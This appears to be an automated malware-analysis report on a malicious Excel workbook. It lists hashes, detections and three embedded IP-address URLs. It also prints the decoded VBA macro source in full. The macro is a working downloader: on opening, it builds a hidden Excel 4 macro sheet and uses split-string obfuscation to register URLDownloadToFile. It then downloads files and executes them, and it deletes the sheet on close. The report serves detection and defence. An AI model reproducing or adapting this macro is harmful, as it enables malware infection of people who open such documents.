Office (OLE) malware analysis — malicious · afa3e9f1e2e8ef35

MALICIOUS

Office (OLE)

129.5 KB Created: 2015-06-05 18:17:20 Authoring application: Microsoft Excel First seen: 2021-10-14

MD5: 24b4d9a5b97f3c5e3868994f514e8092 SHA-1: e82267be7ddec14daa40ec3d08bd1f4e4cbb9eb9 SHA-256: afa3e9f1e2e8ef35f6e723c140476d644698b01eef19742cefac117e640797a4

158 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The file contains VBA macros, including Auto_Open and Auto_Close, which are commonly used to execute malicious code upon opening or closing a document. The presence of the URLDownloadToFile API call strongly suggests that the macros are intended to download and execute a second-stage payload from one of the embedded URLs. The ClamAV detection also confirms its malicious nature as a downloader.

Heuristics 6

ClamAV: Doc.Downloader.Docusign112100-9908075-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Docusign112100-9908075-0
Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD

Reference to URLDownloadToFile API
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Auto_Open macro low OLE_VBA_AUTO

Auto_Open macro
Matched line in script
```
Sub auto_open()
On Error Resume Next
```
Auto_Close macro low OLE_VBA_AUTOCLOSE

Auto_Close macro
Matched line in script
```
End Function
Sub auto_close()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://190.14.37.165/ In document text (OLE body)
- http://5.196.247.11/In document text (OLE body)
- http://188.119.113.3/In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4585 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4585 bytes
SHA-256: `fde66e20711a7f15978b94a5a866f07b9d20ea1d8f560b84fb649e896abaaf38`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Option Explicit Public Sub applyLogosToDashboard() On Error Resume Next Application.ScreenUpdating = False If Not Application.OperatingSystem Like "Mac" Then Sheets("Dashboard").Activate Sheets("Dashboard").Unprotect Password:=Sheets("Logos").Range("IV1") ActiveSheet.Shapes("Apple_Logo").Visible = False ActiveSheet.Shapes("Win_Logo").Visible = True ActiveSheet.Shapes("Button_Insert_Logo").Visible = True ActiveSheet.Shapes("Button_Print_PDF").Visible = True ActiveSheet.Shapes("Button_Save_As").Visible = True ActiveSheet.Shapes("Button_Help").Visible = True ActiveSheet.Shapes("Button_Versions").Visible = True Sheets("Logos").Protect Password:=Sheets("Dashboard").Range("IV1"), DrawingObjects:=True, Contents:=True, Scenarios:=True Else Sheets("Dashboard").Activate Sheets("Dashboard").Unprotect Password:=Sheets("Dashboard").Range("IV1") ActiveSheet.Shapes("Apple_Logo").Visible = True ActiveSheet.Shapes("Win_Logo").Visible = False ActiveSheet.Shapes("Button_Insert_Logo").Visible = False ActiveSheet.Shapes("Button_Print_PDF").Visible = False ActiveSheet.Shapes("Button_Save_As").Visible = False Sheets("Dashboard").Protect Password:=Sheets("Dashboard").Range("IV1"), DrawingObjects:=True, Contents:=True, Scenarios:=True End If Application.ScreenUpdating = True End Sub Private Sub asWorkbook_Activateas() End Sub Private Sub saWorkbook_Opensa() On Error Resume Next End Sub Private Sub ssaaInitWorkbookssaa() End Sub Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "UserForm2" Attribute VB_Base = "0{86A322E3-3EAA-43BD-A15C-2E5BDAB20ADE}{6DC45358-AAC1-427A-8A44-4B339D5A54C8}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Module5" Sub auto_open() On Error Resume Next Trewasd = "R" & "E" & "G" & "I" & "STER" Drezden = "=" Naret = "E" & "X" & "E" & "C" DUJSKFASD = UserForm2.Label5.Caption Application.ScreenUpdating = False jgfjgjfhfhf Sheets("Sheettt").Visible = False Sheets("Sheettt").Range("A1:M100").Font.Color = vbWhite Sheets("Sheettt").Range("H24") = UserForm2.Label1.Caption Sheets("Sheettt").Range("H25") = UserForm2.Label3.Caption Sheets("Sheettt").Range("H26") = UserForm2.Label4.Caption Sheets("Sheettt").Range("K17") = "=N" & "O" & "W()" Sheets("Sheettt").Range("K18") = ".d" & "a" & "t" Sheets("Sheettt").Range("H35") = "=" & "H" & "ALT()" Sheets("Sheettt").Range("I9") = "u" & "R" & "l" & "M" & "o" & "n" Sheets("Sheettt").Range("I10") = UserForm2.Caption Sheets("Sheettt").Range("I11") = "J" & "J" & "C" & "C" & "B" & "B" Sheets("Sheettt").Range("I12") = "Byukilos" Sheets("Sheettt").Range("G10") = "..\Celod.wac" Sheets("Sheettt").Range("G11") = "..\Celod.wac1" Sheets("Sheettt").Range("G12") = "..\Celod.wac2" Sheets("Sheettt").Range("I17") = DUJSKFASD Sheets("Sheettt").Range("I18") = DUJSKFASD & "1" Sheets("Sheettt").Range("I19") = DUJSKFASD & "2" Sheets("Sheettt").Range("H10") = "=Byukilos(0,H24&K17&K18,G10,0,0)" Sheets("Sheettt").Range("H11") = "=Byukilos(0,H25&K17&K18,G11,0,0)" Sheets("Sheettt").Range("H12") = "=Byukilos(0,H26&K17&K18,G12,0,0)" Sheets("Sheettt").Range("H9") = Drezden & Trewasd & "(I9,I10&J10,I11,I12,,1,9)" Sheets("Sheettt").Range("H17") = Drezden & Naret & "(I17)" Sheets("Sheettt").Range("H18") = Drezden & Naret & "(I18)" Sheets("Sheettt").Range("H19") = Drezden & Naret & "(I19)" Application.Run Sheets("Sheettt").Range("H1") End Sub Attribute VB_Name = "Module1" Function jgfjgjfhfhf() Set Fera = Excel4IntlMacroSheets Fera.Add.Name = "Sheettt" End Function Sub auto_close() Application.ScreenUpdating = True Application.DisplayAlerts = False Sheets("Sheettt").Delete Application.DisplayAlerts = True End Sub

SHA-256: fde66e20711a7f15978b94a5a866f07b9d20ea1d8f560b84fb649e896abaaf38

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Public Sub applyLogosToDashboard()
    On Error Resume Next
Application.ScreenUpdating = False

If Not Application.OperatingSystem Like "*Mac*" Then

    Sheets("Dashboard").Activate
    Sheets("Dashboard").Unprotect Password:=Sheets("Logos").Range("IV1")
    ActiveSheet.Shapes("Apple_Logo").Visible = False
    ActiveSheet.Shapes("Win_Logo").Visible = True
    ActiveSheet.Shapes("Button_Insert_Logo").Visible = True
    ActiveSheet.Shapes("Button_Print_PDF").Visible = True
    ActiveSheet.Shapes("Button_Save_As").Visible = True
    ActiveSheet.Shapes("Button_Help").Visible = True
    ActiveSheet.Shapes("Button_Versions").Visible = True
    Sheets("Logos").Protect Password:=Sheets("Dashboard").Range("IV1"), DrawingObjects:=True, Contents:=True, Scenarios:=True

Else

    Sheets("Dashboard").Activate
    Sheets("Dashboard").Unprotect Password:=Sheets("Dashboard").Range("IV1")
    ActiveSheet.Shapes("Apple_Logo").Visible = True
    ActiveSheet.Shapes("Win_Logo").Visible = False
    ActiveSheet.Shapes("Button_Insert_Logo").Visible = False
    ActiveSheet.Shapes("Button_Print_PDF").Visible = False
    ActiveSheet.Shapes("Button_Save_As").Visible = False
    Sheets("Dashboard").Protect Password:=Sheets("Dashboard").Range("IV1"), DrawingObjects:=True, Contents:=True, Scenarios:=True

End If

    Application.ScreenUpdating = True

End Sub


Private Sub asWorkbook_Activateas()

End Sub

Private Sub saWorkbook_Opensa()
    On Error Resume Next


End Sub

Private Sub ssaaInitWorkbookssaa()
End Sub




Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{86A322E3-3EAA-43BD-A15C-2E5BDAB20ADE}{6DC45358-AAC1-427A-8A44-4B339D5A54C8}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Module5"

Sub auto_open()
On Error Resume Next
Trewasd = "R" & "E" & "G" & "I" & "STER"
Drezden = "="
Naret = "E" & "X" & "E" & "C"
DUJSKFASD = UserForm2.Label5.Caption
Application.ScreenUpdating = False
jgfjgjfhfhf
Sheets("Sheettt").Visible = False
Sheets("Sheettt").Range("A1:M100").Font.Color = vbWhite

Sheets("Sheettt").Range("H24") = UserForm2.Label1.Caption
Sheets("Sheettt").Range("H25") = UserForm2.Label3.Caption
Sheets("Sheettt").Range("H26") = UserForm2.Label4.Caption

Sheets("Sheettt").Range("K17") = "=N" & "O" & "W()"
Sheets("Sheettt").Range("K18") = ".d" & "a" & "t"



Sheets("Sheettt").Range("H35") = "=" & "H" & "ALT()"
Sheets("Sheettt").Range("I9") = "u" & "R" & "l" & "M" & "o" & "n"
Sheets("Sheettt").Range("I10") = UserForm2.Caption
Sheets("Sheettt").Range("I11") = "J" & "J" & "C" & "C" & "B" & "B"
Sheets("Sheettt").Range("I12") = "Byukilos"
Sheets("Sheettt").Range("G10") = "..\Celod.wac"
Sheets("Sheettt").Range("G11") = "..\Celod.wac1"
Sheets("Sheettt").Range("G12") = "..\Celod.wac2"
Sheets("Sheettt").Range("I17") = DUJSKFASD
Sheets("Sheettt").Range("I18") = DUJSKFASD & "1"
Sheets("Sheettt").Range("I19") = DUJSKFASD & "2"
Sheets("Sheettt").Range("H10") = "=Byukilos(0,H24&K17&K18,G10,0,0)"
Sheets("Sheettt").Range("H11") = "=Byukilos(0,H25&K17&K18,G11,0,0)"
Sheets("Sheettt").Range("H12") = "=Byukilos(0,H26&K17&K18,G12,0,0)"
Sheets("Sheettt").Range("H9") = Drezden & Trewasd & "(I9,I10&J10,I11,I12,,1,9)"
Sheets("Sheettt").Range("H17") = Drezden & Naret & "(I17)"
Sheets("Sheettt").Range("H18") = Drezden & Naret & "(I18)"
Sheets("Sheettt").Range("H19") = Drezden & Naret & "(I19)"


Application.Run Sheets("Sheettt").Range("H1")

End Sub





Attribute VB_Name = "Module1"

Function jgfjgjfhfhf()
Set Fera = Excel4IntlMacroSheets
Fera.Add.Name = "Sheettt"
End Function
Sub auto_close()


Application.ScreenUpdating = True
   Application.DisplayAlerts = False
   Sheets("Sheettt").Delete
   Application.DisplayAlerts = True

End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.